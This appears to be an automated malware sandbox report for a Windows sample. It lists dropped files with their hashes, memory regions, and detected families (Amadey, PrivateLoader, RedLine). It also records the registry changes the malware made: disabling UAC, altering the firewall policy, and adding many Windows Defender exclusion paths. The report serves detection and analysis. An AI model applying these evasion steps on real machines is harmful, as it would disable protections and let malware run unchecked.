| SHA256 | b542adb1e853812925a1b5a1d1feac30125f05a9d7d0b1adce9ef4c6354c1066 |
| SHA512 | 4c430686f61843fc17c67fa8e78357f576620937137b7153bd2da4cc4f73a104130c221f24fb8060a767eac178bb6b319763b964eeffaa339b73cce444286490 |
memory/936-295-0x00000000003D0000-0x000000000043A000-memory.dmp
memory/936-297-0x0000000005780000-0x000000000581C000-memory.dmp
memory/2148-302-0x0000000140000000-0x000000014159C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\[email protected]\setup.ini
| MD5 | e6edb41c03bce3f822020878bde4e246 |
| SHA1 | 03198ad7bbfbdd50dd66ab4bed13ad230b66e4d9 |
| SHA256 | 9fa80f0889358d9db3d249a2e747e27b7c01c6123b784d94d169c0e54cacf454 |
| SHA512 | 2d71b7d50212f980e82562af95598c430aa0875f7a9d9cc670ba2cb1f63057fb26fd747a99cb4ca08f2355d002daa79bda2236b3ad9e37a3cfef32ae5420e2a1 |
C:\Users\Admin\AppData\Local\Temp\[email protected]
| MD5 | 184a117024f3789681894c67b36ce990 |
| SHA1 | c5b687db3b27ef04ad2b2cbc9f4e523cb7f6ba7e |
| SHA256 | b10d5fef165fc89e61cd16e02eac1b90b8f94ef95218bdd4b678cd0d5c8a925e |
| SHA512 | 354d3bbc1329cbbe30d22f0cf95564e44acc68d6fe91e2beb4584a473d320faf4c092de9db7f1f93cf0b235703fc8de913883985c7d5db6b596244771a1edaf7 |
memory/2148-323-0x0000000140000000-0x000000014159C000-memory.dmp
memory/2148-325-0x0000000140000000-0x000000014159C000-memory.dmp
memory/2148-324-0x0000000140000000-0x000000014159C000-memory.dmp
memory/2148-322-0x0000000140000000-0x000000014159C000-memory.dmp
C:\Windows\System32\GroupPolicy\gpt.ini
| MD5 | 8ef9853d1881c5fe4d681bfb31282a01 |
| SHA1 | a05609065520e4b4e553784c566430ad9736f19f |
| SHA256 | 9228f13d82c3dc96b957769f6081e5bac53cffca4ffde0ba1e102d9968f184a2 |
| SHA512 | 5ddee931a08cfea5bb9d1c36355d47155a24d617c2a11d08364ffc54e593064011dee4fea8ac5b67029cab515d3071f0ba0422bb76af492a3115272ba8feb005 |
memory/2068-333-0x0000000000F10000-0x00000000013E4000-memory.dmp
memory/936-334-0x00000000083F0000-0x00000000086B2000-memory.dmp
memory/936-335-0x0000000004FD0000-0x0000000004FD6000-memory.dmp
memory/936-336-0x0000000008900000-0x000000000891A000-memory.dmp
memory/936-337-0x0000000008390000-0x0000000008396000-memory.dmp
C:\Users\Admin\Pictures\6gOQA073DOsYkG6b0EgvvAcd.exe
| MD5 | acadbe83c09a7a9b8213a662eda12e93 |
| SHA1 | 26a6e55076bc0602ff9060ac529528f3fc631986 |
| SHA256 | 42dd6aeee394e298646701ebe1fd611186ea4ee8c7e6383913db121444635944 |
| SHA512 | a7ad3777e4a5ae9dd8dd09cff3a3ab498c6d2dc5b922407c48936225cb0c91430f75114f46b0a7b39046dc45c26221e199d33ff0bce105e05e903eef7fbdcd9f |
memory/1432-351-0x00000189C8500000-0x00000189C9152000-memory.dmp
memory/2148-356-0x0000000140000000-0x000000014159C000-memory.dmp
memory/2068-357-0x0000000000F10000-0x00000000013E4000-memory.dmp
memory/2068-358-0x0000000000F10000-0x00000000013E4000-memory.dmp
memory/756-360-0x00000000076C0000-0x0000000007882000-memory.dmp
memory/756-361-0x0000000007DC0000-0x00000000082EC000-memory.dmp
memory/2068-365-0x0000000000F10000-0x00000000013E4000-memory.dmp
memory/3296-367-0x0000000000F10000-0x00000000013E4000-memory.dmp
memory/3296-368-0x0000000000F10000-0x00000000013E4000-memory.dmp
memory/2068-370-0x0000000000F10000-0x00000000013E4000-memory.dmp
C:\Users\Admin\Pictures\mmlrDdjIh8SWGrRHE0rDm0Rb.exe
| MD5 | 08063da816c5db77ce64807c4ec2f7e8 |
| SHA1 | 61ded712f36458ba6ffcec37edbf65d5927d2d92 |
| SHA256 | dd08b1356c9b9bffe1ae9c254d28411890204e5b8fe1f9b9af0a7a3e5b6ed61e |
| SHA512 | df74cef767efde4711af6e40ef82801d91c4f1b5805fb0411235272a62fd08204d39153d4ae2056880d9d3ceaaae9c8e87254ea57d35a83bf501ac5be721c5f0 |
C:\Users\Admin\AppData\Local\Temp\7zSFE84.tmp\Install.exe
| MD5 | 7d1dd60c4b8fb4167645f7093801b6d9 |
| SHA1 | 4ae1feb130e57f803ef00709419e6226b7c0e54d |
| SHA256 | 1c62508e00e567d8f753734590a0a303acad2877681173cb4eed2e1a8409f3e9 |
| SHA512 | 7904bcaefe3d2f0e643f24a2e1eb6f0079e28d7df15f7be0fcd73ecc76680a9a677fe199d8a4d80d08144adbd4769d2a14eac2f933404aeeec05fe103429e872 |
C:\Users\Admin\AppData\Local\Temp\7zS68.tmp\Install.exe
| MD5 | 0550ef6afda33ea1c1a231b939ca9b07 |
| SHA1 | f74897166553b218e3a0869502ed036f175be9cd |
| SHA256 | 8462d8b0433559e9afc2cd5de7bffe38fc6b82e3da9e79bdd33a85ab79fafaeb |
| SHA512 | 329fa4ba439852740683dfb60070116fc459785d8a936e59aa4e55affe4697d66c5db844d154b30ab41913342fd5d51760f329cf30dc039387d0929026219a2e |
memory/3700-396-0x0000000002280000-0x00000000022B6000-memory.dmp
memory/3700-397-0x0000000004FB0000-0x00000000055D8000-memory.dmp
memory/3700-398-0x0000000004CD0000-0x0000000004CF2000-memory.dmp
memory/3700-399-0x0000000004E70000-0x0000000004ED6000-memory.dmp
memory/3700-409-0x00000000055E0000-0x0000000005934000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 6d3e9c29fe44e90aae6ed30ccf799ca8 |
| SHA1 | c7974ef72264bbdf13a2793ccf1aed11bc565dce |
| SHA256 | 2360634e63e8f0b5748e2c56ebb8f4aa78e71008ea7b5c9ca1c49be03b49557d |
| SHA512 | 60c38c4367352537545d859f64b9c5cbada94240478d1d039fd27b5ecba4dc1c90051557c16d802269703b873546ead416279c0a80c6fd5e49ad361cef22596a |
memory/3700-411-0x0000000005BA0000-0x0000000005BBE000-memory.dmp
memory/3700-412-0x0000000005BE0000-0x0000000005C2C000-memory.dmp
memory/3700-414-0x0000000005FF0000-0x000000000600A000-memory.dmp
memory/3700-415-0x0000000006100000-0x0000000006122000-memory.dmp
memory/3700-413-0x0000000006060000-0x00000000060F6000-memory.dmp
memory/3208-420-0x0000000000400000-0x000000000045C000-memory.dmp
memory/3208-419-0x0000000000400000-0x000000000045C000-memory.dmp
memory/4160-421-0x0000000010000000-0x00000000105DF000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
| MD5 | def65711d78669d7f8e69313be4acf2e |
| SHA1 | 6522ebf1de09eeb981e270bd95114bc69a49cda6 |
| SHA256 | aa1c97cdbce9a848f1db2ad483f19caa535b55a3a1ef2ad1260e0437002bc82c |
| SHA512 | 05b2f9cd9bc3b46f52fded320b68e05f79b2b3ceaeb13e5d87ae9f8cd8e6c90bbb4ffa4da8192c2bfe0f58826cabff2e99e7c5cc8dd47037d4eb7bfc6f2710a7 |
memory/2900-434-0x0000000006550000-0x00000000068A4000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 4cca81f8abec33cb394ac2aefcedfbf4 |
| SHA1 | bb6c24dfe7399a100401937de182153f81819290 |
| SHA256 | 73fdfd6447979ae3715235e930abd986ff997e0be8483c2541ae8942a0927d64 |
| SHA512 | 8fa1afc28a2209b27273cde6ac133031b4456243162a111a98191ed7cc194cb745dc85a32cfa421080e601b734a07f9ef057f81666d13fa1ff56c845815d23bd |
memory/2900-436-0x0000000006E20000-0x0000000006E6C000-memory.dmp
memory/2068-437-0x0000000000F10000-0x00000000013E4000-memory.dmp
memory/3208-444-0x0000000000400000-0x000000000045C000-memory.dmp
memory/3208-460-0x0000000000400000-0x000000000045C000-memory.dmp
memory/3208-464-0x0000000000400000-0x000000000045C000-memory.dmp
memory/3208-462-0x0000000000400000-0x000000000045C000-memory.dmp
memory/3208-454-0x0000000000400000-0x000000000045C000-memory.dmp
memory/3208-446-0x0000000000400000-0x000000000045C000-memory.dmp
memory/3208-442-0x0000000000400000-0x000000000045C000-memory.dmp
memory/3208-440-0x0000000000400000-0x000000000045C000-memory.dmp
C:\Users\Admin\AppData\Local\Packages\favicon.png
| MD5 | 1603865df23efcd1dc421a48f090b2d5 |
| SHA1 | 29c835478c413295787656da1201a3bd08582267 |
| SHA256 | fc48da13fe7501b9a08daced7a7fadc6914a36c6c12461a73d2170d748be5712 |
| SHA512 | e9bca0319aa1cacdd86a3b5b5904cd508a245e64399acf335299b298feec130985b68ad3456b177aa466284c6239e952aa15ed0e6545ae6ad72848d3ea6405b1 |
memory/1432-479-0x00000189CAE10000-0x00000189CAE22000-memory.dmp
memory/1432-480-0x00000189CAE00000-0x00000189CAE0A000-memory.dmp
memory/2152-499-0x0000000004800000-0x000000000484C000-memory.dmp
C:\Windows\system32\GroupPolicy\Machine\Registry.pol
| MD5 | cdfd60e717a44c2349b553e011958b85 |
| SHA1 | 431136102a6fb52a00e416964d4c27089155f73b |
| SHA256 | 0ee08da4da3e4133e1809099fc646468e7156644c9a772f704b80e338015211f |
| SHA512 | dfea0d0b3779059e64088ea9a13cd6b076d76c64db99fa82e6612386cae5cda94a790318207470045ef51f0a410b400726ba28cb6ecb6972f081c532e558d6a8 |
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | a31b08e129abdcdef5591153352a1cf9 |
| SHA1 | ee8ee7e45221efdac033491170c098af68a101a6 |
| SHA256 | c6f74d674b9bf50343ab42c37166f0776067bc8f8f814ec82a653ef1760a86e0 |
| SHA512 | 8733b80828e2fed769922ed42ae9c56f2727677b5eb4ab60a4465166033c734ca6a68f100dfb20090af922028a009260452fd7c73f872caebb0cec1228c4f63c |
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 259d1b0cade9f0584da21cce4055c7bf |
| SHA1 | 449d15e37b24634c4d1b15ed9eddf615d4b978b3 |
| SHA256 | 96dd9239b86881c3b7ac08d4a7b2fa785b0ad739bdeec8b5db801dc13d6c8cc2 |
| SHA512 | e8f3ba827bdd6d131db58b462f0524fdcce4c8117f15e2063815eac4213c1361fd86f04fb1ef77222a7fd33336b9f29d89a0fe6a38243c9de52478a36f6aa6f5 |
C:\Windows\system32\GroupPolicy\gpt.ini
| MD5 | a62ce44a33f1c05fc2d340ea0ca118a4 |
| SHA1 | 1f03eb4716015528f3de7f7674532c1345b2717d |
| SHA256 | 9f2cd4acf23d565bc8498c989fccccf59fd207ef8925111dc63e78649735404a |
| SHA512 | 9d9a4da2df0550afdb7b80be22c6f4ef7da5a52cc2bb4831b8ff6f30f0ee9eac8960f61cdd7cfe0b1b6534a0f9e738f7eb8ea3839d2d92abeb81660de76e7732 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log
| MD5 | d85ba6ff808d9e5444a4b369f5bc2730 |
| SHA1 | 31aa9d96590fff6981b315e0b391b575e4c0804a |
| SHA256 | 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f |
| SHA512 | 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 2d3e77e2b756ef40d3f9e7b8e372b3fd |
| SHA1 | ed12d740edc87c658b2893c6022b493299196bac |
| SHA256 | b41ffe3bf7fc5ec0289202e08dd13c2e7f2b5f9aa243f2f68f054528f78bce7b |
| SHA512 | a14a4befa7164e7290783de9b718ed9a93fbc614770fa3d001969da467b28f837fe9d9b1b396a9334203e0f4b4e3a77ed558f2bb5e5849d1e521efda210d8a1a |
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 00531af71c86419cadc16bfb65b96888 |
| SHA1 | 21e3477579b9006cd929d91b094c9c9b3f384547 |
| SHA256 | 7828a299bdf15b937bc5ee1c8e66a01c39e01bdb6b7186fff2f3a97e633d6de4 |
| SHA512 | 9966221f39c8bd0f0eda7d807109c26fb3bef2eae1c90245bdbcc6495daf2afa1d939fb227a0f30399ec56e3f7cb63aa1219ee9635ec33fb30011132d4acfe25 |
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 2cf65573a777fa8a6a53ee2d0e466696 |
| SHA1 | 48e740037a9ace814c7d35da38fe7bed432e1472 |
| SHA256 | 8dad417b81a1a4af94876ea3809c94b0a51df178c47213005d4166ef89406ac7 |
| SHA512 | c73690948e37591a4eea411e7845b42d848de7f2c132cd9f0b999ee1df6af0d46812179f14a6243f37517251098ec5dbdf654fd1110e7a45735298396f94057d |
C:\$RECYCLE.BIN\S-1-5-18\desktop.ini
| MD5 | a526b9e7c716b3489d8cc062fbce4005 |
| SHA1 | 2df502a944ff721241be20a9e449d2acd07e0312 |
| SHA256 | e1b9ce9b57957b1a0607a72a057d6b7a9b34ea60f3f8aa8f38a3af979bd23066 |
| SHA512 | d83d4c656c96c3d1809ad06ce78fa09a77781461c99109e4b81d1a186fc533a7e72d65a4cb7edf689eeccda8f687a13d3276f1111a1e72f7c3cd92a49bce0f88 |
C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi
| MD5 | 2a1b63b4db82c956a806d3b9ae026b95 |
| SHA1 | b13ff5de18fa2480888680f2ea73d6de4a862899 |
| SHA256 | 3138e18b6c8847e8a8e39b0007b4f30b08e85617b350a3d60b5be18459ab3d97 |
| SHA512 | 0e08d585bbadc48e638955233ff266347b2205df2b561b759128f1000c99a94e6921553c6592e93d8e0b095842963533abdb5e7289f964f88af5c9d603f296d5 |
memory/4492-628-0x0000000000400000-0x000000000046E000-memory.dmp
memory/4492-636-0x00000000083E0000-0x000000000842C000-memory.dmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\fa\messages.json
| MD5 | 238d2612f510ea51d0d3eaa09e7136b1 |
| SHA1 | 0953540c6c2fd928dd03b38c43f6e8541e1a0328 |
| SHA256 | 801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e |
| SHA512 | 2630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c |
memory/4816-717-0x0000000000F10000-0x00000000013E4000-memory.dmp
C:\Windows\system32\GroupPolicy\Machine\Registry.pol
| MD5 | 0a48000b0ebb8e94be299edc703328fe |
| SHA1 | 02c746f931d1bc73303e8b0fa42eb5cb9bc9cc52 |
| SHA256 | 81d9b12cf4c7aeb97fff5d5616bd36e230c3cd69397f2ad1c962582f1072dd47 |
| SHA512 | 01aeeb4e8417c5784c069bcd7511edec7091274a9bd4e9137152d5e18b11ec7c242253983d1d8732dda72c82a9ca46f06696525a6235b41bea04ddd58fa1c0c1 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\pt_BR\messages.json
| MD5 | 0b1cf3deab325f8987f2ee31c6afc8ea |
| SHA1 | 6a51537cef82143d3d768759b21598542d683904 |
| SHA256 | 0ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf |
| SHA512 | 5bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\en_GB\messages.json
| MD5 | 2a1e12a4811892d95962998e184399d8 |
| SHA1 | 55b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720 |
| SHA256 | 32b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb |
| SHA512 | bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089 |
memory/4816-788-0x0000000000F10000-0x00000000013E4000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\geiolieogaichbpfhcannipendgnnbkn\1.0.1_0\_locales\es\messages.json
| MD5 | bd6b60b18aee6aaeb83b35c68fb48d88 |
| SHA1 | 9b977a5fbf606d1104894e025e51ac28b56137c3 |
| SHA256 | b7b119625387857b257dd3f4b20238cdbe6c25808a427f0110bcb0bf86729e55 |
| SHA512 | 3500b42b17142cd222bc4aa55bf32d719dbd5715ff8d0924f1d75aec4bc6aa8e9ca8435f0b831c73a65cc1593552b9037489294fbf677ba4e1cec1173853e45b |
C:\Program Files (x86)\JipyTrDkU\zCzpeRf.xml
| MD5 | 5fdedc62cf8b6c096029ea2d4e007a2d |
| SHA1 | e3886a29d0cc68c3bb76f9478c90da9f1969225c |
| SHA256 | 39e43e7786d52956285e99ee6f3686c02a7d9bc1895e5aada15a24acd751b417 |
| SHA512 | 58e6293e6d3e497ed5ed13991d5fdeaf7caaef7189ae32f64142fec9a46be1cb45bc6e8c12e5001265054030ed8c1ffb996066a95e91e3e704ae27d1d5ee1a6e |
C:\Program Files (x86)\tegRANPZONsU2\FcWcCnF.xml
| MD5 | 59ae709741836f7ce09fdd81cb0fc925 |
| SHA1 | 594e985d3e6390405a6849a0ed69186ddcdcb241 |
| SHA256 | 0d7cb6bbcb37bb926b8e506367dddfe8f47855b234532f945978354d71480c47 |
| SHA512 | fc8e0449924a299b6ca1b0139e345f814561b107f4069fc4d501870e52a593ad8b7359d4cd3196ca592a8bb1d9e1b21dfc65a03770e9ad79ebba769cab61db7a |
C:\ProgramData\fcblnlcRRSrBhAVB\pALkSkC.xml
| MD5 | 19c25cc6ddacf15400a952ced837aec1 |
| SHA1 | 908042d314b05e03d497df1204029cc02a12d6c1 |
| SHA256 | ad7cfaf678541466b742e166eade87e42b102de302387c4af50cf33aa4fb4707 |
| SHA512 | 51a78938e5fd307b7b2ce297287dc22aa913452827bf37df969b8a19d0296481cec696e10dab24ad440c65ceaec874b64eaa71c4de6e6d6ae547d2945ac0b0e9 |
C:\Program Files (x86)\krdeMCnRKomDOvwVunR\mTHmWcc.xml
| MD5 | 7f8cffdee1195bc8fec684d99a7cee6b |
| SHA1 | 664e11d44b8bc66581a1cacba1a3f88a0527837c |
| SHA256 | 06ebb85adf2d794a65a44eb6d73f64119fef70c92b5ff8c36b6ac13818f7aec0 |
| SHA512 | 2109cef2b0736a5168fa507167f9a83734ff4e59ebe2a987bbd49b3b5909abd9051108fe43fcfb7c5e23881bb97a08f03b04510021d4034be4c7001975db2c1d |
C:\Program Files (x86)\YLgKyOFzWxOqC\sECwqfW.xml
| MD5 | a1b78c59aabf4f964c928a2c52a8a55f |
| SHA1 | f201d58970d505282aecefa7723bda2f803af354 |
| SHA256 | 0376342f4e89576828a158aa7c828624b6c7a25fc3cab04ee25991a534c49880 |
| SHA512 | 0e60bdc5badf81ba8df2e618fa80c90e3218306c1add37d46df1592a9f665edc2898e227036ea610c6262f7ab032c83dc9846f4970e47f301bae36d0a19377a8 |
C:\Windows\Temp\ZmzskowerwXEonlG\OyLtyjEk\dyVGbCr.dll
| MD5 | 10562c5851413e8cdb55e941a851dfa1 |
| SHA1 | 18d6a4f38daec69e40e7f3e0cae8cb00a470fb0e |
| SHA256 | 3ade0c5f052d0e702bba440858944d6bf3ca9b116c11769de46a057970853a5f |
| SHA512 | e26697a7741e8f7c27085cfe7a57600d407115731753258df094997c3f957b28e2dfb127ec0ae5c0286b86a606d3be926932d04d7886d4b7c7cb3af5a86e92cd |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\h6dhg2l4.default-release\prefs.js
| MD5 | ba1f779ad1741f5f15e56d7369b19de8 |
| SHA1 | bdcf3bbcb30d4896e91875edc808631e76a5fb35 |
| SHA256 | b3125cbda3280fe4c9b226b521b34b74dd6ddbb7ed48a8a6f1d30bf1afc8c1d4 |
| SHA512 | e02312c0afb168f4e85c3ff3ca4b13c5892231e3640d84830b789386cf97aa6224909c6c7baf78c57c7a9965709fb599d6cc2d713f9e21f20337150c07064036 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences
| MD5 | 857ea75cc35b5194b53cd793d3f4283b |
| SHA1 | 20e16c87536cdaf145491cb78db969275cf83e3c |
| SHA256 | a0cf672d5788cd311747cc6e640d0d9c597cf1aa594a0bddee215b2cfcad6081 |
| SHA512 | 497fcab1d62074dc2bce04ff259062789c90498198191102d5976982fe7af5b633148de74590f47906b59efa649b422aa9b3c6a7bb06ef2a21e29e68438bebde |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | f0227481eed4af85cb65007ce43fe63e |
| SHA1 | 0a89d0550d4e340a63557587740a2393855ce87b |
| SHA256 | 36e527470bc6b9113a2dfee74d4549287453bad874fb5536436fdd206f86a322 |
| SHA512 | ba60141f6efcf47f023bc92a259d21ac1501c9c9891883e7353327d52499ee1ba734782720f3ef6758ed62e51cd41ba66fa7b7774aeb531ec1bb902471c5b9c1 |
Analysis: behavioral1
Detonation Overview
Submitted
2024-05-30 03:45
Reported
2024-05-30 03:47
Platform
win7-20240220-en
Max time kernel
149s
Max time network
138s
Command Line
Signatures
Amadey
Modifies firewall policy service
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\C:\ = "1" | C:\Users\Admin\Pictures\pNS5nWFOnPuRyVaJWEap6nB1.exe | N/A |
PrivateLoader
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
UAC bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\AppData\Local\Temp\1000020001\file300un.exe | N/A |
Windows security bypass
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\SiHRhjyUhlpwxPXaT = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\ZmzskowerwXEonlG = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\YLgKyOFzWxOqC = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\fcblnlcRRSrBhAVB = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\fcblnlcRRSrBhAVB = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\nFLFFjqrQPUn = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\ZmzskowerwXEonlG = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\ZmzskowerwXEonlG = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\JipyTrDkU = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\YLgKyOFzWxOqC = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\krdeMCnRKomDOvwVunR = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\nFLFFjqrQPUn = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\tegRANPZONsU2 = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\SiHRhjyUhlpwxPXaT = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\ZmzskowerwXEonlG = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\JipyTrDkU = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | C:\Windows\SysWOW64\reg.exe | N/A |
